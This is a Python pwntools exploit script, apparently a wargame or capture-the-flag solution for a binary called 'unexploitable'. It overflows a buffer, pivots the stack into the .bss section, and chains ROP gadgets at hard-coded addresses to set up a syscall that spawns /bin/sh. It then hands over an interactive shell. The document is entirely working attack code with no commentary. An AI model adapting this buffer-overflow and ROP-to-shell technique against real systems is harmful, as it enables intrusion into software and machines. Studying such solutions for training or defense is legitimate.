unexploitable_rop.py

from pwn import *

def syscall():
  return p64(0x0000000000400560)
  
def set_rbx_rbp_r12_r13_r14_r15(rbx, rbp, r12, r13, r15):
  return ''.join([
  	p64(0x00000000004005e6),
    p64(0),
    p64(rbx),
    p64(rbp),
    p64(r12),
    p64(r13),
    p64(r15),
    p64(0)
  ])

def mov_rdx_r15_mov_rsi_r14_mov_edi_r13d_call_r12_plus_rbx_m8():
  return p64(0x00000000004005d0)

def read():
  return p64(0x000000000040055b)
  
def ret():
  return p64(0x0000000000400577)
  

bss_section = 0x0000000000601028 + 0x10 

p = process("/home/unexploitable/unexploitable")
sleep(3)
p.send(
  "A"*16 +
  p64(bss_section) +
  read() + 
  p64(0)
  )
sleep(1)


p.send( 
  #new stack here
  "A"*16 + 
  p64(bss_section) +
  read() +
  set_rbx_rbp_r12_r13_r14_r15(0, 0, 0x601088, 0x601098, 0) +
  mov_rdx_r15_mov_rsi_r14_mov_edi_r13d_call_r12_plus_rbx_m8() +
  syscall() + 
  "/bin/sh\0" #0x601098
  )
  
sleep(1)
p.send(
  "A"*16 + 
  p64(bss_section+8) + #skip read()
  ret() +
  p64(0x00000000004005e6) + #from set_rbx_rbp_r12_r13_r14_r15
  p64(0xBBBBBBBBBBBBBBBB) +
  p64(0) +
  p8(0) + p8(0) + p8(0)
  )
  
p.interactive()